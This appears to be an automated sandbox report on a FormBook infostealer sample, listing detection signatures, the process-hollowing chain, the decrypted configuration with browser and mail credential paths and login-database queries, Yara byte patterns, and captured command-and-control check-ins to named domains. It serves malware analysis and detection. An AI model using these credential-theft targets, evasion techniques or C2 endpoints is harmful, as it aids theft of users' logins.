
Analysis Report JdtN8nIcLi8RQOi.exe

Overview

General Information

Sample Name: JdtN8nIcLi8RQOi.exe
Analysis ID: 339360
MD5: aee550440966b0bd34d9ccb2b1f7f146
SHA1: 14125d61fbcf4b63cb9c9ad82a60be3ad9aa2a3d
SHA256: d31340f14a66b43a1f5cf461cf48278bb97bfc33ef5a8bd0b29d0a3e6f315895
Tags: exe, Formbook, Outlook

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • JdtN8nIcLi8RQOi.exe (PID: 6596 cmdline: 'C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe' MD5: AEE550440966B0BD34D9CCB2B1F7F146)
    • JdtN8nIcLi8RQOi.exe (PID: 5756 cmdline: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe MD5: AEE550440966B0BD34D9CCB2B1F7F146)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • WWAHost.exe (PID: 7052 cmdline: C:\Windows\SysWOW64\WWAHost.exe MD5: 370C260333EB3149EF4E49C8F64652A0)
          • cmd.exe (PID: 4832 cmdline: /c del 'C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x79dc", "KEY1_OFFSET 0x1bb1e", "CONFIG SIZE : 0xb5", "CONFIG OFFSET 0x1bc1e", "URL SIZE : 22", "searching string pattern", "strings_offset 0x1a693", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xc41a2362", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70a3", "0x9f715032", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad012162", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd013cd", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0xc72ce2d5", "0x263178b", "0x57585356", "0x9cb95240", "0xcc39fef", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", 
"0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", "encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Mail\\", "\\Foxmail", "\\Storage\\", "\\Accounts\\Account.rec0", "\\Data\\AccCfg\\Accounts.tdat", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", 
".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "philippebrooksdesign.com", "cmoorestudio.com", "profille-sarina23tammara.club", "dqulxe.com", "uiffinger.com", "nolarapper.com", "maconanimalexterminator.com", "bisovka.com", "loveisloveent.com", "datication.com", "spxo66.com", "drhelpnow.com", "ladybug-cle.com", "macocome.com", "thepoppysocks.com", "eldritchparadox.com", "mercadolibre.company", "ismartfarm.com", "kansascarlot.com", "kevinld.com", "p87mbu2ss.xyz", "the-makery.info", "untegoro.site", "newyorkcityhemorrhoidcenter.com", "crystalclearwholistics.com", "iregentos.info", "fullskis.com", "promanconsortium.com", "800029120.com", "mummyisme.com", "humpychocks.com", "myfavestuff.store", "naturalfemina.com", "bimetalthermostatksd.com", "draysehaniminciftligi.com", "sf9820.com", "4thop.com", "24les.com", "thepupcrew.com", "strangephobias.com", "hotmamabody.com", "restaurantsilhouette.com", "texasadultdayservices.com", "binahaiat.com", "nipseythegreat.com", "pelisplusxd.net", "mamborio.com", "elitedigitalperformance.com", "therileyretreat.com", "aieqbgk.icu", "corkboardit.net", "katieberiont.com", "telemedicinehamilton.com", "imagistor.com", "tekdesignltd.com", "bmw-7979.com", "animaliaartist.com", "straightlineautoserviceerie.net", "qoo10online.com", "tesseracoffee.com", "central-car-sales.com", 
"thecleaningenthusiast.com", "musicmercch.com", "pearlpham.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.allismd.com/ur06/\u0000"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.676624298.0000000003A61000.00000004.00000001.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
18 further entries not shown.

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x158a9:$sqlite3step: 68 34 1C 7B E1
  • 0x159bc:$sqlite3step: 68 34 1C 7B E1
  • 0x158d8:$sqlite3text: 68 38 2A 90 C5
  • 0x159fd:$sqlite3text: 68 38 2A 90 C5
  • 0x158eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1 further entry not shown.

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack | Malware Configuration Extractor: FormBook (configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: JdtN8nIcLi8RQOi.exe | ReversingLabs: Detection: 21%
Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1030008243.0000000002F00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1029358545.00000000024A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: JdtN8nIcLi8RQOi.exe | Joe Sandbox ML: detected
Source: 1.2.JdtN8nIcLi8RQOi.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: JdtN8nIcLi8RQOi.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Source: JdtN8nIcLi8RQOi.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: WWAHost.pdb | source: JdtN8nIcLi8RQOi.exe, 00000001.00000002.718229203.0000000002D70000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000002.00000000.693274413.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: WWAHost.pdbUGP | source: JdtN8nIcLi8RQOi.exe, 00000001.00000002.718229203.0000000002D70000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: JdtN8nIcLi8RQOi.exe, 00000001.00000002.715992028.000000000122F000.00000040.00000001.sdmp, WWAHost.exe, 00000006.00000002.1030089804.0000000003130000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: JdtN8nIcLi8RQOi.exe, WWAHost.exe
Source: Binary string: mscorrc.pdb | source: JdtN8nIcLi8RQOi.exe, 00000000.00000002.676064079.00000000035A0000.00000002.00000001.sdmp
Source: Binary string: wscui.pdb | source: explorer.exe, 00000002.00000000.693274413.0000000005A00000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h | 0_2_01BAD530
Source: C:\Users\user\Desktop\JdtN8nIcLi8RQOi.exe | Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h | 0_2_01BAD520

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49762 -> 104.18.45.60:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49762 -> 104.18.45.60:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49762 -> 104.18.45.60:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49776 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49776 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49776 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49777 -> 192.185.0.218:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49777 -> 192.185.0.218:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49777 -> 192.185.0.218:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49780 -> 198.54.117.244:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49780 -> 198.54.117.244:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49780 -> 198.54.117.244:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49783 -> 104.18.45.60:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49783 -> 104.18.45.60:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49783 -> 104.18.45.60:80
Source: global traffic | HTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=4+vqZVQ9LP0tYNJwqIJqTMrGnRgLKgnq9++j1JI6NapyJjh9DnkjagOTogd41UqO7PE2 HTTP/1.1; Host: www.bimetalthermostatksd.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ur06/?jL30vv=dBzHXj1PLbGKDWSMCg4tmT0IZWR4k/GAB0M1UwNUCAEqMwDxdKAMxPHuhT5PYnumJ/v6&w0G=ndiTFPcHXxkLG HTTP/1.1; Host: www.straightlineautoserviceerie.net; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=31XH+/ZkH6XWvzYOvP3dx+IltFKBIJcLA5RIt4d/klJVe3zOK/eQlkY/FHXkQqvnuoQd HTTP/1.1; Host: www.cmoorestudio.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ur06/?jL30vv=NJdWbsV2u7ATozThGPJW562SCHcv7adlbOXfAv9Rw44AAe+AdzXHr9B7MZkJTBbvjbit&w0G=ndiTFPcHXxkLG HTTP/1.1; Host: www.eldritchparadox.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ur06/?jL30vv=BLpM+XglrGwTrWtiHdGoG40JsMcPSm8iORhOlRiMANzAAX7CCeL6vzWJ6p48bTgbztAd&w0G=ndiTFPcHXxkLG HTTP/1.1; Host: www.maconanimalexterminator.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=SenOS+jiEhQsuYdnS8KK2YdnjEIKOH+7o8Lvbhr21pYexuZLRoxHhUWNXl+HYUmJ1/t8 HTTP/1.1; Host: www.pelisplusxd.net; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ur06/?jL30vv=R1dv3tLNzttObehYo892z3FELmFAXC2EgVCVJfB+F2lXvaFDj3qFBxZfIQjQXtvKW9z0&w0G=ndiTFPcHXxkLG HTTP/1.1; Host: www.allismd.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ur06/?jL30vv=7oeiAeISlGN8ATY8TjVBysJw/3nzl2xshDi2TlZG2Er+GunmAOvGptEcgdjOJyhRTFcZ&w0G=ndiTFPcHXxkLG HTTP/1.1; Host: www.central-car-sales.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=qNrglUbFifKvXZZeMYdibfvK5E/9yAA1c1CJDAe3PRhdaqjNfOqDODvVKVKG0O/H2/CO HTTP/1.1; Host: www.nolarapper.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=NKxnqf7a7ozavnCY1aZFqreRnCS22NCG0XgpkTZRPmotMOP3cY/OXqYmjSvaJBGJlRUe HTTP/1.1; Host: www.promanconsortium.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ur06/?w0G=ndiTFPcHXxkLG&jL30vv=/QZku4jr0440TRq1cGoqU4zGfqmcs15TzcELdSgrk2PZPfOWImoRhmS5wBIMgXh1KjYf HTTP/1.1; Host: www.profille-sarina23tammara.club; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic | HTTP traffic detected: GET /ur06/?jL30vv=od76TQmID0UO/sc9+bcFatn96tBtJGQtXfTaHo3viWpz9AXNvDUjqBKfptgwNsw4Xhh6&w0G=ndiTFPcHXxkLG HTTP/1.1; Host: www.restaurantsilhouette.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: Joe Sandbox View | IP Address: 192.185.0.218
Source: Joe Sandbox View | ASN Name: SOFTLAYERUS
Source: Joe Sandbox View | ASN Name: AS-26496-GO-DADDY-COM-LLCUS
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: unknown | DNS traffic detected: queries for: www.bimetalthermostatksd.com
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 13 Jan 2021 20:40:18 GMT Content-Type: text/html Content-Length: 867 Connection: close Server: Apache/2 Last-Modified: Fri, 10 Jan 2020 16:05:10 GMT Accept-Ranges: bytes Accept-Ranges: bytes Age: 0 | Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ hei
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
            Source: explorer.exe, 00000002.00000002.1030409117.0000000002B50000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
            Source: WWAHost.exe, 00000006.00000002.1029486637.000000000250A000.00000004.00000020.sdmp | String found in binary or memory: http://www.animaliaartist.com/ur06/?jL30vv=DfgF7yDRSUzi2OKDRXwTsSYzBeik9khHCLZes6TEJ2ymfZv/W121O8qOC
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
            Source: WWAHost.exe, 00000006.00000002.1030966590.00000000037E2000.00000004.00000001.sdmp | String found in binary or memory: http://www.searchvity.com/
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 00000002.00000000.697679795.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn

            E-Banking Fraud:

            Yara detected FormBook
            Source: Yara match | File source: 00000001.00000002.717711099.0000000001440000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.717802806.0000000001470000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.677918274.0000000004A61000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.1028678660.0000000000320000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.714305814.0000000000400000.00000040.00000001.sdmp, type: MEMORY
